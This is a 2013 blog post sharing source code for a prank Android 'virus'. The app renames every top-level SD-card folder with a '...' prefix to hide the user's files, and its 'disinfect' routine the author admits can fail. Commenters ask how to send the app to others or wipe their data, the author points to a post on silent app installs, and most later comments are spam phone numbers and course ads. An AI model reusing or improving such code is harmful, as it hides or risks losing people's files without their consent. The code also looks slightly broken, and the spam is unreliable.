Thursday 30 May 2013


Creating a simple virus program(harmless,just for fun / prank)....

This program can infect the phone as well as disinfect it....

(disinfecting will not function properly in some cases,data is not actually lost anywhere but you have to recover it manually in such case... **it is also described below)
so use at own risk....

Screen shot:-
After infecting






but yet it works in most cases

This posts include a simple program in android which is capable to invisible all the SD-Card content of phone from file manager,gallery and media scanner...

The basic idea behind it is only to hide/invisible the SD-Card content from phone.so Android OS gets unaware about that data and don't shows it up.....

In Android system folders having a dot "." as initial of its name considered as hidden .... so what we do is to make each SD-card folder to start with "..." to hide them ex- 'image' --> '...image'
and while disinfecting we have to remove those dots to unhide them from system....


here we are using three dots "..." as prefix to differ them from android system hidden files..

Source code:-

package com.example.fun_virus;



import java.io.File;
import java.util.ArrayList;
import java.util.List;

import android.app.Activity;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.os.Environment;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.Button;
import android.widget.Toast;

public class Fun_Virus_Activity extends Activity 
{
private File file;
private List<String> myList;

public void onCreate(Bundle savedInstanceState) 
{
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_fun__virus);
    
    myList = new ArrayList<String>();   

    String root_sd = Environment.getExternalStorageDirectory().toString();
    file = new File( root_sd + "/" ) ;       
    Button btn_infect = (Button) findViewById(R.id.btn_infect);
Button btn_disinfect = (Button) findViewById(R.id.btn_disinfect);
    
    btn_infect.setOnClickListener(new OnClickListener() {

@Override
public void onClick(View arg0) {
// TODO Auto-generated method stub
SharedPreferences settings = getSharedPreferences("mysp", MODE_PRIVATE);
String inf = settings.getString("INFECTED","NO");
if(inf.equals("OK"))
{
Toast.makeText(Fun_Virus_Activity.this,"Already Infected", 5).show();
}else
{
infect();
 
   SharedPreferences.Editor prefEditor = settings.edit();
   prefEditor.putString("INFECTED", "OK");
  
   prefEditor.commit();
}
}
});
    
btn_disinfect.setOnClickListener(new OnClickListener() {

@Override
public void onClick(View arg0) {
// TODO Auto-generated method stub
disinfect();
Fun_Virus_Activity.this.getSharedPreferences("mysp", 0).edit().clear().commit();
}
});
    
    
    
    


public void infect()
{
File list[] = file.listFiles();
for( int i=0; i< list.length; i++)
{
myList.add( list[i].getName() );
Log.e("files : ",i+":"+ myList.get(i).toString());
File file = new File(list[i].getParent()+"/"+myList.get(i));
//File file2 = new File(list[i].getParent()+"..."+myList.get(i));
Log.e("abs_path",list[i].getParent()+"/"+myList.get(i)+"");
//boolean success = file.renameTo(file2);

boolean success= file.renameTo(new File(list[i].getParent(),"..."+myList.get(i)));


        Log.e("bool",success+"" );
}
}

public void disinfect()
{
File list[] = file.listFiles();
for( int i=0; i< list.length; i++)
{
myList.add( list[i].getName() );
Log.e("files : ",i+":"+ myList.get(i).toString());
File file = new File(list[i].getParent()+"/"+myList.get(i));
String aa= myList.get(i).replace("...", "");
Log.e("replace", aa+"");
boolean success= file.renameTo(new File(list[i].getParent(),aa));


       Log.e("bool",success+"" );
}
}


}



And the layout :-


<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
 android:background="@drawable/vrs_logo"
    tools:context=".Fun_Virus_Activity" >

    <Button
        android:id="@+id/btn_infect"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:layout_alignParentLeft="true"
        android:layout_alignParentTop="true"
        android:layout_marginTop="32dp"
        android:text="INFECT" />

    <Button
        android:id="@+id/btn_disinfect"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:layout_alignBaseline="@+id/btn_infect"
        android:layout_alignBottom="@+id/btn_infect"
        android:layout_alignParentRight="true"
        android:text="DISINFECT" />

</RelativeLayout>

**
In a condition when all previous data is not visible after disinfecting then you have to manually recover those data using file explorer like:-Es File Explorer,AndroZip etc..
you should rename folders with "..." prefix to there original name ex:- '...image' -->'image'
This will show data again.

143 comments:

  1. One more thing forgot to mention is to add permission

    uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"

    in your manifest file.

    ReplyDelete
  2. where we have write those comands in notepad or any other software

    ReplyDelete
    Replies
    1. You will need android sdk and an integrated development environment (IDE)to write android programs...

      I would suggest you to download latest ADT bundle(includes sdk and eclipe IDE) from here - http://developer.android.com/sdk/index.html

      just extract it and you are ready to go.

      this tutorial will provide you much more details - http://mobile.tutsplus.com/tutorials/android/creating-android-hello-world-applications/

      Delete
  3. Check my next post to install an app without user get knowledge of it...

    Unfortunately it not works on some devices.

    Here-
    http://suhebqureshi.blogspot.in/2013/08/is-it-possible-to-install-application.html

    ReplyDelete
  4. add me man : hackersohail.blogspot.com

    ReplyDelete
    Replies
    1. Hey please help me ...
      Please teach me hacking
      Please reply me

      Delete
  5. juz tell me the procedure do work with this program in SDK..
    WAT SHOULD I DO WITH THIS CODE'S

    ReplyDelete
    Replies
    1. Just copy this code as it is in your eclipse android project.


      if that doesn't help.stay tuned!!!....
      I am going to post source code link soon- within 1 week.....

      Delete
  6. hi i need to know how many xml files u used

    ReplyDelete
  7. But how to use both java and HTML codes together?? And how to use them in phone and how to send them through whatsapp?? :/ please tell

    ReplyDelete
  8. better iadea just copy the script in a notepad and save it with any name but with .apk in the end thats it my friand

    ReplyDelete
  9. Can that code be written on NETBEANS IDE??

    ReplyDelete
  10. This is a very interesting blog, thanks for sharing. Make sure you are careful when doing this. I recently had a virus on my phone and had to get it repaired. Cell Phone Repair Pros did a great job, I would definitely recommend them if you are in a similar position to what I was in. :)

    ReplyDelete
  11. This comment has been removed by the author.

    ReplyDelete
  12. can I download this app from anywhere

    ReplyDelete
  13. this code is infect my pc n how to sent this s/w for one android os

    ReplyDelete
  14. How can we send a virus to someone else android phone which can erase all the data from sd card n cell?

    ReplyDelete
  15. what is the extantion of the source code

    ReplyDelete
  16. Is it possible to erase all the data of SD card and phone without taking his/her phone...

    ReplyDelete
  17. Hello Sir i want to Delete some phones all data using virus file, how can i do it? www.chat4enjoy.com

    ReplyDelete
  18. Thanks for your information, Nice one and much more informative and article.
    Android Training in Chennai

    ReplyDelete
  19. Hello Sir i want to Delete some phones all data using virus file, how can i do it?
    www.talkchatrooom.com

    ReplyDelete
  20. How to use this code in android plz help me..

    ReplyDelete
  21. Thanks Admin for sharing such a useful post, I hope it’s useful to many individuals for developing their skill to get good career.
    Python training in marathahalli
    AWS Training in chennai

    AWS Training in bangalore

    ReplyDelete
  22. It is amazing and wonderful to visit your site.Thanks for sharing this information,this is useful to me...
    Blueprism training in Chennai

    Blueprism training in Bangalore

    Blueprism training in Pune

    ReplyDelete
  23. Thank you a lot for providing individuals with a very spectacular possibility to read critical reviews from this site.

    Data Science training in Chennai
    Data science training in bangalore
    Data science online training
    Data science training in pune

    ReplyDelete
  24. The knowledge of technology you have been sharing thorough this post is very much helpful to develop new idea. here by i also want to share this.

    angularjs Training in bangalore

    angularjs Training in btm

    angularjs Training in electronic-city

    angularjs online Training

    angularjs Training in marathahalli

    ReplyDelete
  25. Excellent post !!!. The strategy you have posted on this technology helped me get into
    the next level and had lot of information in it.
    RPA Online Training

    APPIUM Online Training

    ORACLE EXADATA Online Training

    PYTHON Online Training

    ReplyDelete
  26. Were a gaggle of volunteers as well as starting off a brand new gumption within a community. Your blog furnished us precious details to be effective on. You've got completed any amazing work!

    Java training in Bangalore | Java training in Electronic city

    Java training in Chennai | Java training institute in Chennai | Java course in Chennai

    Java training in USA

    Java training in Bangalore | Java training in Indira nagar

    ReplyDelete
  27. This is most informative and also this post most user friendly and super navigation to all posts... Thank you so much for giving this information to me.

    rpa training in chennai
    rpa training in bangalore
    rpa course in bangalore
    best rpa training in bangalore
    rpa online training

    ReplyDelete
  28. Useful information.I am actual blessed to read this article.thanks for giving us this advantageous information.I acknowledge this post.and I would like bookmark this post.Thanks
    python training institute in marathahalli
    python training institute in btm
    Python training course in Chennai

    ReplyDelete
  29. I am really very happy to find this particular site. I just wanted to say thank you for this huge read!! I absolutely enjoying every petite bit of it and I have you bookmarked to test out new substance you post.
    Python training in bangalore
    Python course in pune
    Python training in bangalore
    python training in chennai
    python course institute in chennai

    ReplyDelete
  30. Inspiring writings and I greatly admired what you have to say , I hope you continue to provide new ideas for us all and greetings success always for you..Keep update more information.

    rpa training in chennai
    rpa training in bangalore
    rpa course in bangalore
    best rpa training in bangalore
    rpa online training

    ReplyDelete
  31. Very informative blog post! I would like to thank for the efforts you have made in writing this great article. Thanks for sharing.


    Data Science Courses in Bangalore

    ReplyDelete
  32. Excellent Blog! I would like to thank for the efforts you have made in writing this post. I am hoping the same best work from you in the future as well. I wanted to thank you for this websites! Thanks for sharing. Great websites!





    DATA SCIENCE COURSE MALAYSIA

    ReplyDelete
  33. QuickBooks Customer Support Number, particularly, does not need any introduction for itself. But a person who is unknown to the great accounting software, we would like you to give it a try.

    ReplyDelete
  34. QuickBooks Customer Service Phone Number has almost changed this really is of accounting. Nowadays accounting has exploded in order to become everyone’s cup of tea and that’s only become possible because because of the birth of QuickBooks accounting software.

    ReplyDelete
  35. Only at Support for QuickBooks Enterprise . User get directly linked to expert certified Technicians to have instant fix for his or her accounting or technical issues.

    ReplyDelete
  36. The favorite QB versions: Pro Advisor, Payroll and Enterprise have brought a revolution in the current business competition . Do not hesitate to anytime 27×7 e mail us the QuickBooks Support Number and fixing various types of issue within a brief period

    ReplyDelete
  37. At QuickBooks Support Number we work on the principle of consumer satisfaction and our effort is directed to give a transparent and customer delight experience. A timely resolution in the minimum span could be the targets of QuickBooks Toll-Free Pro-Advisors.

    ReplyDelete
  38. The most typical errors faced by the QuickBooks users is unknown errors thrown by QuickBooks Technical Support Number software during the time of software update.

    ReplyDelete

  39. In certain updates and new introductions, QuickBooks keeps enhancing the buyer experience by offering them more facilities than before. Payroll is amongst the important the various components of accounting, therefore the QuickBooks Payroll Service Number leaves no stone unturned in making it more & more easier for users.

    ReplyDelete
  40. Since this application is becoming a catalyst to make use of more sophisticated equipment and tools because of the improvement in accounting software technology. Thus, it’s natural to tackle each one of these tech glitches with the best accounting software. You are able to troubleshoot QuickBooks errors making use of the Intuit QuickBooks support by dialing our QuickBooks Online Enterprise Contact Number.

    ReplyDelete
  41. The guide may have helped you understand Intuit QuickBook Support corruption and ways to resolve it accordingly. If you wish gain more knowledge on file corruption or any other accounting issues, then we welcome you at our professional support center.

    ReplyDelete
  42. This issue wouldn't normally arise in the event that you closely monitor every single transaction that takes place on a monthly basis. If this dilemma arises, the greatest you are able to do is make contact with the QuickBooks Payroll Customer Support Number.

    ReplyDelete
  43. We ensure your calls do not get bounced. If the calls are failing to relate solely to us at quickbook support contact number, then you can certainly also join all of us by dropping an email without feeling shy. Our QuickBooks Tech Support Phone Number will stay available even at the wee hours.

    ReplyDelete
  44. when you feel something went wrong with your accounting software and cannot discover a way out, you can get QuickBooks Customer Support Number from our experts’ team, working day and night to solve any issues associated with QuickBooks.

    ReplyDelete

  45. What’re basic reasons for corruption of QuickBooks Tech Support Number Company Data file?
    Prior to trying to improve it, the next logical step you need to perform is usually to investigate the complexities behind such corruption.

    ReplyDelete
  46. Phone Number for QuickBooks Payroll Support
    So so now you are becoming well tuned directly into advantages of QuickBooks online payroll in your business accounting but because this premium software contains advanced functions that will help you and your accounting task to accomplish, so you could face some technical errors when using the QuickBooks payroll solution. In that case, Quickbooks online payroll support number provides 24/7 make it possible to our customer. Only you must do is make a person call at our toll-free QuickBooks Payroll tech support number . You could get resolve most of the major issues include installations problem, data access issue, printing related issue, software setup, server not responding error etc with this QuickBooks payroll support team.

    ReplyDelete
  47. We will now let you take a quick sneak-peek on the features of this software:
    QuickBooks Enterprise Tech Support Phone Number allows you to enjoy advanced pricing, easy transfer of data through compressing etc. in its retail version.

    ReplyDelete
  48. You might encounter QuickBooks Error 6000-301 when wanting to access/troubleshoot/open the company file in your QuickBooks. Your workflow gets hindered with an Error message that says– “QuickBooks Desktop tried to access company file. Please try again.”

    ReplyDelete
  49. Our research team at QuickBook Tech Support Phone Number is dependable for a lot of other reasons as well. We have customer care executives which are exceptionally supportive and pay complete awareness of the demand of technical assistance created by QuickBooks users.

    ReplyDelete
  50. The principal functionality of QuickBooks Support Numberis dependent upon company file. On the basis of the experts, if you would like solve the situation, then you'll definitely definitely have to accept it first. The error will not fix completely and soon you comprehend the root cause related to problem.

    ReplyDelete
  51. Many users always think about QuickBooks journal entry that how exactly to easily create. So don’t worry about it our excellent QuickBooks Tech Support Number team supply you every knowledge about this topic also.

    ReplyDelete
  52. If not, this might be simply the right time to get the QuickBooks Customer Support Number. We have trained staff to soft your issue. Sometimes errors may also happen as a consequence of some small mistakes. Those are decimals, comma, backspace, etc. Are you proceed through to cope with this? If you do not, we have been here that will help you.

    ReplyDelete
  53. Many users always think about QuickBooks journal entry that how to easily create. So don’t worry about this our excellent QuickBooks Tech Support Phone Number team provide you every information about this topic also.

    ReplyDelete
  54. Our clients get back to us often times. We keep all the data safe plus in Intuit QuickBooks Support We will never share it with other people. Thus, you can rely on us in terms of almost every data. we have a method of deleting the ability which you have put immediately from our storage. Thus, there's no possibility for data getting violated. You should arrive at us when it comes to a number of software issues. The satisfaction can be high class with us. It is possible to call us in several ways. You can journey to our website today. It is time to get the best help.

    ReplyDelete
  55. Its not only simple but in addition could be manage easily , accounting software which helps to control finances smartly. The QuickBooks Payroll Support Phone Number is active at any hour for assistance.

    ReplyDelete
  56. No matter whether you are getting performance errors or perhaps you are facing any kind of trouble to upgrade your software to its latest version, you are able to quickly get advice about QuickBooks 2018 support phone number. Each time you dial QuickBooks Phone Number, your queries get instantly solved. Moreover, you could get in contact with our professional technicians via our email and chat support options for prompt resolution on most related issues.

    ReplyDelete
  57. Contact HP Printer Support Number services and Help Support Providing the users aided by the best manufacturing products and devices, HP is considered to be among the leading companies on the planet.

    ReplyDelete
  58. QuickBooks Enterprise Support Phone Number: This company is the primary uncertain style of business with terms of profit and investment. But, using the support of QuickBooks Enterprise all of this is starting to become easier than you imagine.

    ReplyDelete
  59. QuickBooks payroll support number allow you to run your payroll in a simple way without facing any glitch or errors. Our QuickBooks technical support team dedicated to assisting you to operate payroll, pay employees, after low-taxes and deductions. Our QuickBooks Payroll Support Phone Number is a toll-free service and covered a large area of QB services.

    ReplyDelete
  60. It is nearly extremely hard not to wander away once in a very whereas following the written account to handle the accounts. That is why intuit created QuickBooks Support Phone Number: associate degree accounting and management code. Today, QuickBooks is the most used accounting and management code out there.

    ReplyDelete

  61. The net is stuffed with faux numbers WHO decision themselves the QuickBooks Support Provider. you’ll value more highly to dial their variety however that might be terribly risky. you’ll lose your QuickBooks Tech Support Phone Number Company file or the code itself. dig recommends dialing solely the authentic QuickBooks Support contact number.

    ReplyDelete
  62. You won’t have any stress in operation. Even for small companies we operate. This technique is wonderful for a medium-sized company. You may get the most wonderful financial tool. QuickBooks Payroll Support Number is present 24/7. You can actually call them anytime. The experts are thrilled to aid.

    ReplyDelete
  63. Our hard-working QuickBooks Payroll Support Phone Number team that contributes into the over all functioning of your business by fixing the errors that could pop up in QuickBooks Payroll saves you against stepping into any issue further.

    ReplyDelete
  64. I really appreciate this post. I have been looking all over for this!. You have made my day! Thank you again. Random video chat

    ReplyDelete
  65. Amazing, this is great as you want to learn more, I invite to This is my page. apk for android

    ReplyDelete
  66. I just want to let you know that I just check out your site and I find it very interesting and informative.. IMEI Tracking

    ReplyDelete
  67. Nice blog. It has valuable content with all the supporting statements for your point of view. I like the way you have dealt with the issue. It was knowledgeable. If you need a software that can easily help you in managing your money, try using QuickBooks accounting software. It is a customizable software, where you can get various accounting features at an affordable rate. It allows you to activate services that can help you in improving the account management skills. If you wish to take assistance for using the software, use toll-free QuickBooks Support Phone Number +1-800-311-5657. Read more:- https://www.enetserves.com/quickbooks-support-phone-number

    ReplyDelete
  68. Really good work, I like your blog. It’s really difficult to find deft bloggers who write beautifully with the best quality content. For handling data and processes of your business, use QuickBooks accounting software. It offers unique features that allow you to easily manage all your business accounting process up to one million customers, vendors and, items including throughout tracking. Though in case of any error get software support, call on QuickBooks Helpline Number +1-800-311-5657. With our experts, we provide premium quality service at an affordable price rate. Our support team includes highly skilled and experienced technicians who are available 24X7. Read more: - https://www.enetserves.com/quickbooks-helpline-number

    ReplyDelete
  69. What a splendid job. I liked the way you have expressed your ideas. It is highly impressive. Keep sharing your blogs. In case, you are searching for some accounting software that can reduce your workload and provide error-free data, I would suggest you to use QuickBooks. It is a versatile bookkeeping tool that can be used by anyone and everyone. You don’t need an expert to work on it. Moreover, if you face any error you can call on the QuickBooks Support Phone Number +1-844-233-5335 that is active at all times. Read more: - https://www.probfix.com/

    ReplyDelete

  70. Very well explained and informative blog click here for QuickBooks support phone number and for more detail dial on 800-901-6679

    ReplyDelete
  71. Your post is wonderful and is speckled with full of authentic information. Thank you for sharing such an ideal post. Keep sharing more and frequently my mate I love to go through your posts as they are genuine and your crispy writing style is awesome. QuickBooks Enterprise is a wonderful version of QuickBooks that helps the business to foster at a rapid speed and easily manages and controls the accounting and financial service of your business. However, this accounting software is not immune to errors and bus and thus the user may encounter any of such frequently. Thus, to get it fixed permanently and quickly contact QuickBooks Enterprise Support Phone Number +1-800-311-5657 and avail instant and perfect help. Read more: - https://www.enetserves.com/quickbooks-enterprise

    ReplyDelete
  72. Awesome! you deserve full marks for this blog-post. I've been fascinated with your writing abilities. I hope that you are aware of QuickBooks, which offers amazing facilities to their users and recently introduced their latest version of QuickBooks 2020, the world's leading accounting software. For any query or fixing any issue dial toll-free number QuickBooks Enterprise Support Phone Number +1-800-311-5657 and avail the world-class service at competitive price. Don’t see the time because we are available 24x7. So, what you waiting for? Call us right away! Read more: - https://www.getsupportphonenumber.com/quickbooks-enterprise-support/

    ReplyDelete
  73. Simply amazing…! I am highly impressed to read such an informative piece of work. I like the points you have highlighted in the article. For people, finding it hard to manage their accounts, I would suggest them to use QuickBooks. It is the widely used accounting software across the globe. This software is developed and marketed by Intuit. It is available in different versions and is loaded with a plethora of features. The customers of this software have the option to take live assistance from the ProAdvisors. They are the industry experts and aware of the latest changes in the accounting pattern. To speak to them call onQuickBooks Helpline Number 1-844-200-2627. Visit us: https://www.enetservepartners.com/quickbooks-helpline-number/

    ReplyDelete
  74. Your Post is quite informative and provides unknown facts and figures in the simplest of languages. The best part of the post is the presentation. Thank you for sharing such an amazing post and would like to read more of your new posts. So, keep posting my mate frequently. Now, easily save time and enhance your business with QuickBooks Enterprise software. In case, you face any problem while using this QuickBooks Enterprise, make an immediate call at QuickBooks Enterprise Support Phone Number 1-844-200-2627. Visit us: https://www.enetservepartners.com/quickbooks-enterprise-support/

    ReplyDelete
  75. What a fantastic work. It is really brainstorming. I liked the whole concept. Keep sharing more on the subject. In case, you want some reliable tool to assist you in accounting work, try QuickBooks. It is one of the most trusted toolkits that help users to perform multiple tasks related to accounts management as well as business analysis. For the first time product users or the people facing error while working on the software, there is a 24*7 working helpline number. The customers can call on QuickBooks Support Phone Number +1-833-322-8848 to avail the support. Read more: - https://www.mildaccounting.com/quickbooks-support-phone-number/

    ReplyDelete
  76. Your blogging skill is stupendous. You wrote a great blog with clear reference to all the potential debatable topic. Apart from this, you must consider using QuickBooks payroll as your computer accounting software if you have trouble handling the payday accounting system. With this technology, limitless payrolls are easily created and all facets of payday accounting can be easily managed. To receive support, please call QuickBooks Payroll Support Phone Number +1-833-322-8848. At this number you will get world-class service at an affordable rate from our ProAdvisor. Call now! Read more: - https://sortqb.com/quickbooks-payroll-support-phone-number/

    ReplyDelete
  77. Nice. It is quite different from your previous works. I like the whole concept and would enjoy reading more on it. All the best for your blogging career. QuickBooks is an amazing software designed to match the requirement of small and medium-sized businesses. It has the potential to carry out works like manage inventory, send estimates, run reports, pay employees, track income and sales and much more. Moreover, users can take the expert’s advice if they find any problem using the software. To avail of the assistance give a call on QuickBooks Helpline Number +1-844-232-0202. Read more: - https://www.mildaccounting.com/quickbooks-helpline-number/

    ReplyDelete
  78. Do you want to talk to our experts to get your QuickBooks issues resolved? Dial our QuickBooks Toll Free Phone Number +1(855)-907-0406.

    ReplyDelete
  79. Do you want to talk to our experts to get your QuickBooks issues resolved? Dial our QuickBooks Toll Free Phone Number +1(855)-907-0406.

    ReplyDelete
  80. One of the most significant tasks in business is Payroll processing. A small mistake in payroll calculations can lead to impeded business growth and lost revenue. Thus, to avoid such hassle, QuickBooks Payroll is considered as a superior product. To get support for errors, reach our experts via QuickBooks Payroll Support Phone Number +1(855)-907-0605. Visit us- https://dentalphonenumber.com/quickbooks-payroll-support-phone-number/

    ReplyDelete
  81. Hey! What an amazing post. I love the way you write. Your blogs always elaborate the topics which makes them easier to understand for the reader’s. If you’re using QuickBooks and facing any error, just reach to us at QuickBooks Enterprise Support Phone Number +1 844-232-0202. Read more: - https://qbooksenterprisesupportphonenumber.site123.me/

    ReplyDelete
  82. http://quotocpoetic.blogspot.com

    ReplyDelete
  83. https://www.quoticpoetic.blogspot.com

    ReplyDelete
  84. juvtccvotxitx9tcoycictot8x8tc8x8tx.
    https://quoticpoetic.blogspot.com/

    ReplyDelete

  85. QuickBooks Payroll is the subset feature of the software. There are various other extensive feature & versions of the QuickBooks. Where QuickBooks Payroll gains the preference of various users such as Entrepreneurs, Freelancers, small & medium size firms. In case of discrepancy, call QuickBooks Support Phone Number 833-780-0086. For More Visit: https://goo.gl/maps/HKWZM3sJzkQVsjuG7

    ReplyDelete
  86. is it really works?

    then really a great post that you have shared with us. Thanks for sharing this information.

    data science with Python Training in Bangalore

    data science Python Course in Bangalore

    ReplyDelete
  87. Dealing with QuickBooks issues is no more a hassle now! Dial our QuickBooks Payroll Support Phone Number 855-907-0406 to get instant and effective resolutions. We have a team of qualified experts to look after your problems.
    View on Map: QuickBooks Support Phone Number

    ReplyDelete
  88. Thank You, Suheb Qureshi.

    Easily, the article is actually the best topic on this registry related issue. I fit in with
    data science training in pune conclusions and will eagerly look forward to your next updates.

    ReplyDelete
  89. Suhebb Qureshi, The errand begins with examining the issue which a Data Scientist must accomplish by posing great inquiries. Deciphering, purging and changing the unstructured information is very testing, yet energizing simultaneously.data science course in mumbai

    ReplyDelete
  90. I am really enjoying reading your well written articles. It looks like you spend a lot of effort and time on your blog. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work.

    machine learning course

    artificial intelligence course in mumbai

    ReplyDelete
  91. Hi, Thanks for sharing nice blog posting, are guys done a great job...

    AI Training In Hyderabad

    ReplyDelete
  92. Well explained and informative blog. To get QuickBooks Support click bellow
    quickbooks customer service in Oregon +1 844-442-1522
    QuickBooks customer service phone number in Oregon +1 844-442-1522
    quickbooks phone number in Oregon +1 844-442-1522
    quickbooks support quickbooks support number in
    Oregon +1 844-442-1522
    quickbooks support phone number
    in Oregon+1 844-442-1522
    quickbooks customer service number
    in Oregon +1 844-442-1522

    ReplyDelete
  93. This is a wonderful article, Given so much info in it, These type of articles keeps the users interest in the website, and keep on sharing more ... good luck.

    data science interview questions

    ReplyDelete
  94. I just got to this amazing site not long ago. I was actually captured with the piece of resources you have got here. Big thumbs up for making such wonderful blog page!

    artificial intelligence course in bangalore

    ReplyDelete
  95. I really loved the concept you can find more virus concept here too https://www.cybergeeksquad.co

    ReplyDelete
  96. Awesome Post!!! I really enjoyed reading this article. It's really a nice experience to read your post. Thanks for sharing.

    AWS training in Chennai

    AWS Online Training in Chennai

    AWS training in Bangalore

    AWS training in Hyderabad

    AWS training in Coimbatore

    AWS training

    ReplyDelete
  97. very well explained. I would like to thank you for the efforts you had made for writing this awesome article. This article inspired me to read more. keep it up.
    Correlation vs Covariance
    Simple Linear Regression
    data science interview questions
    KNN Algorithm
    Logistic Regression explained

    ReplyDelete
  98. very well explained. I would like to thank you for the efforts you had made for writing this awesome article. This article inspired me to read more. keep it up.
    Correlation vs Covariance
    Simple Linear Regression
    data science interview questions
    KNN Algorithm
    Logistic Regression explained

    ReplyDelete
  99. wonderful article. I would like to thank you for the efforts you had made for writing this awesome article. This article resolved my all queries. data science courses

    ReplyDelete
  100. Really nice and interesting post. I was looking for this kind of information and enjoyed reading this one. Keep posting. Thanks for sharing.
    Artificial Intelligence Course

    ReplyDelete
  101. Howdy, I figure your blog might be having web program similarity issues. At the point when I investigate your site in Safari, it looks fine notwithstanding, when opening in IE, it has some covering issues. I simply needed to give you a brisk heads up! Beside that, superb site!
    earthcycle

    ReplyDelete
  102. Thanks for sharing the amazing contetnt very useful.

    Data Science Training in Pune

    ReplyDelete
  103. Quickbooks is software use for bookkeeping or accounting work if you face problem quickbooks won't open. You can resolve quickbooks diagnostic tool.

    ReplyDelete
  104. Hopefully, Quicbooks Error 103& 310 is now fixed! For better assistance in resolving Quickbooks error 103&310, contact QBSsolved at 1-888-910-1619

    ReplyDelete
  105. Bangaloredigitalmarketing provides the best Digital Marketing courses in bangalore with certification
    and placements in jayanagar, marathahalli
    https://bangaloredigitalmarketing.com/
    https://bangaloredigitalmarketing.com/digital-marketing-courses-in-bangalore/
    https://bengalurudigitalmarketing.blogspot.com/

    ReplyDelete
  106. Always so interesting to visit your site.What a great info, thank you for sharing. this will help me so much in my learning
    data scientist training in hyderabad

    ReplyDelete